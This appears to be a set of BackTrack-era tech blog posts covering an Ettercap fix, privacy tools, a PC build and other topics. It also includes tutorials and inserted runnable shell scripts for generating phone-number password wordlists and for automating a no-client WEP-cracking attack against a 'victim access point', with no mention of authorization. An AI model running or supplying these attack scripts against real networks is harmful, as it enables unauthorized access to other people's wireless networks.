Ettercap Host Scan lockup Fix

This is a quick fix I ran across while trying to get Ettercap working. Ettercap comes installed by default on BackTrack 5 R2, but the stock build tends not to work: it crashes as soon as you launch a Host Scan.

The solution comes from this BackTrack forum thread, to give credit: http://www.backtrack-linux.org/forums/showthread.php?t=40562

First, remove the currently installed version: apt-get remove ettercap

Next, download these rebuilt Ettercap packages. They are third-party builds from a Launchpad PPA, and dpkg -i runs each package's maintainer scripts as root, so only install them if you trust the builder.

For BT5 32bit go to: https://launchpad.net/~timothy-redae…+build/1758139
For BT5 64bit go to: https://launchpad.net/~timothy-redae…+build/1758138

Download the three built .deb files and install them in a single dpkg call so their dependencies on each other resolve (the 64-bit filenames end in _amd64.deb instead of _i386.deb): dpkg -i ettercap-common_0.7.3-1.4ubuntu1drizzt1_i386.deb ettercap-gtk_0.7.3-1.4ubuntu1drizzt1_i386.deb ettercap_0.7.3-1.4ubuntu1drizzt1_i386.deb

If dpkg reports unmet dependencies, run apt-get -f install to pull them in.

Ettercap should now be available in the Backtrack menu under Applications > Internet > ettercap

This will prevent ettercap from crashing after the host scan.


Privacy Tools

The recent reporting on the Microsoft/Skype snooping accusations has prompted some paranoia and raised questions, mine included. In this blog post Microsoft refuses to comment on whether it can listen in on Skype VoIP calls. New wiretapping laws are pushing some software vendors toward installing "backdoors" in their software, and Skype is a likely candidate. Think of this as a preventative measure rather than paranoia. If you aren't aware, Skype and most other IM services store your message history on their servers, typically for months, depending on their data retention policy. Not that you have anything to hide, but law enforcement can subpoena that data from the vendor and use it against you. This post started off as a list of alternatives to Skype, but I added a few other privacy tools as well.

IM Privacy

First off there's Jitsi. Jitsi (previously SIP Communicator) is an audio/video and chat client that supports SIP, XMPP/Jabber, AIM/ICQ, Windows Live, Yahoo! and several other protocols.

Jitsi also has Skype-like features such as video and VoIP calling. It has been a great up-and-coming tool and a workable replacement for Skype.

Another suggestion is Pidgin. Pidgin is a multi-protocol messenger that talks to almost every IM network. More importantly, it supports a plug-in called OTR (Off-The-Record). When OTR is enabled on both ends, messages are end-to-end encrypted, so anyone watching the wire or the IM server (ISP, attackers, the service itself) can't read them. Note that OTR protects the message contents only: who you talk to, and when, is still visible to the IM service. You can get it here.

SILC (Secure Internet Live Conferencing) is a conferencing protocol designed with security as one of its main principles, providing rich conferencing features with strong encryption built in. Many of its features resemble traditional chat protocols such as IRC, while others come from instant messaging (IM) style protocols.

Email 

riseup.net: they don't keep logs, retain identifying information, or record IP addresses, which makes them a far more privacy-friendly option than Gmail, Hotmail, etc. Keep in mind that mail sent from there to other providers still travels to, and sits on, the other side's servers in the clear unless you encrypt it end to end (e.g. with PGP).

OS

Tor. Go here for a full explanation, as I can't be bothered to repeat it. It can be installed on Linux/Windows/Mac and anonymizes your traffic.

Tails. The tl;dr version: a bootable Linux distro that routes all traffic through the Tor network.

Tails is a live system that aims at preserving your privacy and anonymity. It helps you use the Internet anonymously almost anywhere you go and on any computer, and leaves no trace on that computer unless you explicitly ask it to.

It is a complete operating-system designed to be used from a DVD or a USB stick independently of the computer’s original operating system. It is Free Software and based on Debian GNU/Linux.

Tails comes with several built-in applications pre-configured with security in mind: web browser, instant messaging client, email client, office suite, image and sound editor, etc

Tails relies on the Tor anonymity network to protect your privacy online: all software is configured to connect through Tor, and direct (non-anonymous) connections are blocked.

Tor is free software and an open network that helps you defend against traffic analysis, a form of network surveillance that threatens personal freedom and privacy, confidential business activities and relationships, and state security.

Tor protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, and it prevents the sites you visit from learning your physical location. It does not encrypt your traffic beyond the exit relay, though: the exit node, and anyone watching it, can read whatever you send in the clear, so use HTTPS or another end-to-end encrypted protocol on top of Tor.

Using Tails on a computer doesn’t alter or depend on the operating system installed on it. So you can use it in the same way on yours, the computer of a friend or one at your local library. After removing your Tails DVD or USB stick the computer can start again on its usual operating system.

VPN

A VPN (Virtual Private Network) tunnels your traffic through the provider's servers. "Anonymous" VPN providers claim not to keep logs of who uses the service or what they do, and their servers are usually located abroad. No logs means no data to subpoena, and no data means no problems. TorrentFreak did a good review of which anonymous VPNs are really anonymous and which actually keep logs and cooperate with law enforcement; it can be found here. A VPN is a convenient way to keep your Internet activity private from your ISP, but the downside is that it costs money, usually $5-10 USD a month, and you are moving your trust to the VPN provider: a "no logs" policy is a promise you cannot verify, and the provider sees all your traffic. If you are worried about a paper trail, most accept Bitcoin or you could use a pre-paid credit card.

Generate 10 Digit Phone Numbers using Crunch in Backtrack

Phone numbers are a common choice of password for WEP/WPA-protected wireless networks, and several ISPs use them as easy-to-remember default passwords on the routers they hand out. By generating a list of every possible phone number with a specific area code, generally your own, you get a compact dictionary that covers that whole class of passwords in a dictionary attack. Using crunch, which is built into BackTrack 5 R2, you can generate every possible number beginning with a given area code.

Applications > BackTrack > Privilege Escalation > Password Attacks > Offline Attacks > crunch

Use the following command

./crunch 10 10 -t 123%%%%%%% -o /root/123.txt

Explanation of the command: the first 10 is the minimum and the second 10 the maximum length, so every line is exactly 10 characters (the menu entry drops you into crunch's own directory, hence ./crunch). -t specifies a pattern in which only the placeholder characters vary: @ is replaced by lowercase letters, , by uppercase letters, % by digits and ^ by symbols. Here 123 is the fixed area code followed by seven % placeholders, giving 10,000,000 numbers. -o names the output file; it can be saved anywhere and the .txt extension is only a convention. Expect a file of about 110 MB (11 bytes per line); crunch prints 100% when it is finished. Now you can load the list in Gerix (or pass it to aircrack-ng -w) and run a dictionary attack against a captured WPA handshake.

Note: most cities have multiple area codes, so generate one file per area code and combine them: cat 123.txt 456.txt 789.txt > all.txt (use > rather than >> unless you really mean to append to an existing all.txt; three area codes come to roughly 330 MB).
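As an added example that is not part of the original post, the following POSIX shell script builds the same area-code lists with plain awk, handles several area codes in one pass (no separate cat step) and can optionally drop local numbers that the North American numbering plan never assigns. The NANP assumption and the script are mine, not crunch's or the post's.

```shell
#!/bin/sh
# Added example, not from the post: area-code phone-number wordlists with plain
# awk, any number of area codes into one file, without crunch or the cat step.
# Assumptions (mine, not the post's): NANP-style numbers, i.e. a 3-digit area
# code plus 7 local digits. The "nanp" variant drops local numbers whose first
# digit is 0 or 1, which the NANP exchange format (NXX, N = 2-9) never assigns.

LOCALDIGITS="${LOCALDIGITS:-7}"   # digits after the area code

# gen_numbers AREACODE [LOCALDIGITS]
# Prints AREACODE followed by every zero-padded local number,
# i.e. the same list as: crunch 10 10 -t AREACODE%%%%%%%
gen_numbers() {
    awk -v ac="$1" -v n="${2:-$LOCALDIGITS}" 'BEGIN {
        fmt = "%s%0" n "d\n"          # e.g. "%s%07d\n"
        limit = 10 ^ n
        for (i = 0; i < limit; i++) printf fmt, ac, i
    }'
}

# gen_numbers_nanp AREACODE [LOCALDIGITS]
# Same list minus local numbers starting with 0 or 1 (never valid exchange
# codes): 20% fewer candidates to try, no real numbers lost.
gen_numbers_nanp() {
    gen_numbers "$1" "${2:-$LOCALDIGITS}" |
        awk -v ac="$1" 'substr($0, length(ac) + 1, 1) !~ /[01]/'
}

# wordlist_bytes AREACODE...: disk space the full (unfiltered) list takes.
# 10 digits + newline = 11 bytes per line, 10,000,000 lines per area code.
wordlist_bytes() {
    echo $(( $# * 10000000 * 11 ))
}

# build_wordlist OUTFILE AREACODE...: writes every area code to one file, in
# order, and prints the total line count. Replaces crunch plus cat.
build_wordlist() {
    out="$1"; shift
    : > "$out"
    for ac in "$@"; do
        gen_numbers "$ac" >> "$out"
    done
    wc -l < "$out"
}

# Usage:  build_wordlist /root/all.txt 123 456 789
#         aircrack-ng -w /root/all.txt -b <BSSID> capture-01.cap
if [ "${1:-}" = "build" ]; then shift; build_wordlist "$@"; fi
```

Run it as sh script.sh build /root/all.txt 123 456 789, or source it and call gen_numbers_nanp 123 > /root/123.txt when you want the smaller list. The awk loop streams its output, so nothing is held in memory regardless of how many area codes you add.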

WEP Cracking in Backtrack 5 using Gerix

I’m creating several posts at once, and I’ll be adding screen shots shortly, bear with me.

Boot into BackTrack 5 R2. You'll need a laptop with a wireless card that supports monitor mode and packet injection.

Applications >BackTrack > Exploitation Tools > Wireless Exploitation Tools > WLAN Exploitation > gerix-wifi-cracker-ng

Note: the pane at the bottom of Gerix shows the commands currently running, so if something goes wrong you can see exactly what failed.

With Gerix open, go to the Configuration Tab.

You should see your interface listed as wlan0. Select it and click the button below labeled Enable/Disable Monitor Mode. This puts the card into monitor mode and creates a new interface, mon0.

At this point you can also click Set random MAC address to spoof your MAC. If you do, the fake authentication later on must use the same MAC the card is now transmitting with, or the AP will drop your injected frames.

Click the mon0 interface so it's highlighted. Underneath it is a Rescan Networks button; click it to search for SSIDs.

Select the desired WEP network SSID.

Click the WEP tab, then Start Sniffing and Logging. A window opens showing the BSSID MAC, PWR (signal strength) and other data. Keep this window open: it is the capture that collects the IVs you will crack.

Click Performs a test of injection AP to confirm your card can inject packets. You should see the message "Injection is working!". You can close this window.

For this demonstration we will use WEP Attacks (no-client). Click the button labeled as such.

Under Fragmentation attack, click Associate with AP using fake auth. The bottom data viewer should read "Fake authentication with mon0", followed by a successful association.

Click the Fragmentation attack button. Once it captures a usable packet it prompts "Use this packet ?"; type y for yes. On success it writes a keystream file (fragment-*.xor) that the next step uses to forge a packet.

Click Create the ARP packet to be injected on the victim access point.

Click Inject the created packet on victim access point and type y in this box as well. Keep this window open: it keeps replaying the forged ARP request so the AP answers with fresh IVs.

Go to the Cracking tab and, under WEP Cracking, click the Aircrack-ng – Decrypt WEP password button. Watch the IV count here (e.g. "got 10000 IVs").

You will generally need about 10,000–20,000 IVs for a 64-bit key, sometimes fewer; 128-bit keys typically need 40,000 or more. Collecting them takes from 30 seconds to a couple of minutes depending on how fast injection is going. You can safely close this window and click the button again once enough IVs have been captured.

The key will be displayed in this window ("KEY FOUND!") when cracking succeeds.
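As an added example (not from the original post, and not Gerix's own code), here is the aircrack-ng command sequence behind the Gerix buttons above, written as a small script so the no-client attack can be repeated without the GUI, together with a check of the IV counter that airodump-ng writes to its CSV log. The interface names, MACs, SSID and channel below are placeholders I made up; DRY_RUN=1 prints each command instead of running it.

```shell
#!/bin/sh
# Added example, not from the post: the aircrack-ng suite commands behind each
# Gerix button in the no-client (fragmentation) WEP attack, plus a check of the
# IV count in airodump-ng's CSV so you know when cracking is worth starting.
# Assumptions: every interface/AP value below is a constructed placeholder;
# override them in the environment. DRY_RUN=1 prints commands instead of
# executing them.

IFACE="${IFACE:-wlan0}"
MON="${MON:-mon0}"                      # interface airmon-ng creates on BT5
BSSID="${BSSID:-00:11:22:33:44:55}"     # target AP MAC (placeholder)
ESSID="${ESSID:-TargetWEP}"             # target SSID (placeholder)
OURMAC="${OURMAC:-00:AA:BB:CC:DD:EE}"   # MAC of $MON, real or spoofed (placeholder)
CHANNEL="${CHANNEL:-6}"
CAP="${CAP:-wepcap}"                    # airodump-ng prefix -> wepcap-01.cap / .csv
IV_TARGET="${IV_TARGET:-20000}"         # ~20k IVs for 64-bit keys, 40k+ for 128-bit
DRY_RUN="${DRY_RUN:-0}"

run() {
    if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Configuration tab: Enable/Disable Monitor Mode
monitor_on()    { run airmon-ng start "$IFACE" "$CHANNEL"; }
# WEP tab: Start Sniffing and Logging (leave running in its own terminal)
sniff()         { run airodump-ng -c "$CHANNEL" --bssid "$BSSID" -w "$CAP" "$MON"; }
# WEP tab: Performs a test of injection
inject_test()   { run aireplay-ng -9 -e "$ESSID" -a "$BSSID" "$MON"; }
# WEP Attacks (no-client): Associate with AP using fake auth
fake_auth()     { run aireplay-ng -1 0 -e "$ESSID" -a "$BSSID" -h "$OURMAC" "$MON"; }
# Fragmentation attack: answer y at the prompt; writes keystream file fragment-*.xor
fragmentation() { run aireplay-ng -5 -b "$BSSID" -h "$OURMAC" "$MON"; }
# Create the ARP packet to be injected; $1 is the .xor file from the previous step
forge_arp()     { run packetforge-ng -0 -a "$BSSID" -h "$OURMAC" -k 255.255.255.255 -l 255.255.255.255 -y "$1" -w arp-request; }
# Inject the created packet (answer y; leave running, it drives the IV count up)
inject_arp()    { run aireplay-ng -2 -r arp-request "$MON"; }
# Cracking tab: Aircrack-ng - Decrypt WEP password
crack()         { run aircrack-ng -b "$BSSID" "$CAP"-*.cap; }

# iv_count CSVFILE BSSID: prints the "# IV" column airodump-ng logs for BSSID
# (the number Gerix shows as "got N IVs"). CSV fields are separated by ", ".
iv_count() {
    awk -F', ' -v b="$2" '$1 == b { gsub(/ /, "", $11); print $11 }' "$1"
}

# enough_ivs CSVFILE BSSID: succeeds once at least IV_TARGET IVs are captured
enough_ivs() {
    n=$(iv_count "$1" "$2")
    [ -n "$n" ] && [ "$n" -ge "$IV_TARGET" ]
}

# The whole attack in Gerix order. Start sniff in a second terminal first;
# when enough_ivs "$CAP-01.csv" "$BSSID" succeeds, run crack.
attack() {
    monitor_on
    inject_test
    fake_auth
    fragmentation
    forge_arp "$(ls -t fragment-*.xor | head -n 1)"
    inject_arp
}

if [ "${1:-}" = "attack" ]; then attack; fi
```

Run sniff in a second terminal before sh script.sh attack; the aireplay-ng -5 and -2 steps prompt for y exactly as Gerix does, and the -2 step keeps running. Poll enough_ivs wepcap-01.csv <BSSID> from a third shell and start crack once it succeeds; with DRY_RUN=1 you can confirm the exact command lines first.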

VMware Tools Install on Ubuntu

With your virtual machine running, in the VMware menu, VM > Install VMware Tools.

Open a terminal in the virtual machine and run the following as root (the # prompt):

# mkdir /mnt/cdrom; mount /dev/cdrom  /mnt/cdrom
# cp /mnt/cdrom/VMwareTools-<version>.tar.gz /tmp/
# cd /tmp/
# tar zxpf VMwareTools-<version>.tar.gz 
# cd vmware-tools-distrib/
# ./vmware-install.pl 
Accept default settings if you are unsure.

This should work on most Linux VMs. On Ubuntu you can alternatively install the distribution's own open-vm-tools package with apt-get instead of using the VMware-supplied installer.

Run Google Chrome as root

In BackTrack you are logged in as root by default. If you install Google Chrome and try to run it, Chrome refuses to start as root and you get an error like this

Open a terminal and do the following

# gedit /usr/bin/google-chrome

This will open up gedit. Scroll to the very bottom of the script.

The last line will look like

exec -a "$0" "$HERE/chrome" "$@"

Add the following to the end of that line, separated from the closing quote by a space:

--user-data-dir

The resulting line should look as follows

exec -a "$0" "$HERE/chrome" "$@" --user-data-dir

Save and close.

Google Chrome will now launch as root. Keep in mind that this bypasses a deliberate safeguard: a browser running as root hands any renderer or plug-in exploit full control of the machine. Giving Chrome an explicit profile path, e.g. --user-data-dir=/root/.chrome, at least keeps its profile where you expect it, and running Chrome as an unprivileged user is the safer fix.

Gaming Rig

Went all out on this one.

  • CoolerMaster HAF 922
  • ASUS Sabertooth X79 LGA 2011 Intel X79 SATA 6Gb/s USB 3.0
  • Intel Core i7-3820 Sandy Bridge-E 3.6GHz (3.8GHz Turbo Boost) LGA 2011
  • CORSAIR Vengeance 16GB (4 x 4GB) DDR3 SDRAM DDR3 1866
  • CORSAIR Professional Series HX750W Power Supply
  • CORSAIR H100 Extreme Performance Liquid CPU Cooler
  • XFX Radeon HD 6870 2GB 256-bit GDDR5 PCI Express 2.1 x16
  • WD Caviar Black 1TB 7200 RPM 64MB Cache SATA 6.0Gb/s
  • Asus VE248 24″ Monitor

boxes of fun

Haf 922 stripped

Sabertooth x79

Incorrect fan/radiator positioning.

The image above, shows the original “pull” method I had for the Corsair H100 cooler. Due to the large heatsink on the top of the board, the fan would not fit. Putting the fans in a “push” setup, with the fans on top of the radiator blowing air downwards, was the solution. The fans are 120x120x25, so there is no room for a push/pull setup in this Haf 922 case. I have some thinner fans (120x120x12mm) that I plan to install to utilize the push/pull method.

Messy

Almost done

Runs like a champ. Plays Crysis, Skyrim, Battlefield 3, etc. at full 1920×1080 resolution with all graphics settings maxed. Surprising for a 6870 2GB card that costs only $200.

What’s next?

  • Apply Arctic Silver 5 to heatsink
  • Install 2 Scythe 120x120x12mm fans for push/pull
  • Add second Radeon 6870 for Crossfire
  • Add second WD HD for RAID 0 setup

More to come on this post as it progresses. I’ll post some benchmarks from 3DMark and upload some newer pictures soon..

3DMark 11 Basic Edition

Graphics Score: 4142
Physics Score: 8881
Combined Score: 4089

Heaven Benchmark v3.0 Basic

FPS: 42.7
Score: 1075
Min FPS: 25.0
Max FPS: 79.8

Hardware

Binary: Windows 32bit Visual C++ 1600 Release Mar 7 2012
Operating system: Windows 7 (build 7601, Service Pack 1) 64bit
CPU model: Intel(R) Core(TM) i7-3820 CPU @ 3.60GHz
CPU flags: 3602MHz MMX SSE SSE2 SSE3 SSSE3 SSE41 SSE42 HTT
GPU model: AMD Radeon HD 6800 Series 8.950.0.0 2048Mb

Settings

Render: direct3d11
Mode: 1920×1080 8xAA fullscreen
Shaders: high
Textures: high
Filter: trilinear
Anisotropy: 4x
Occlusion: enabled
Refraction: enabled
Volumetric: enabled
Tessellation: disabled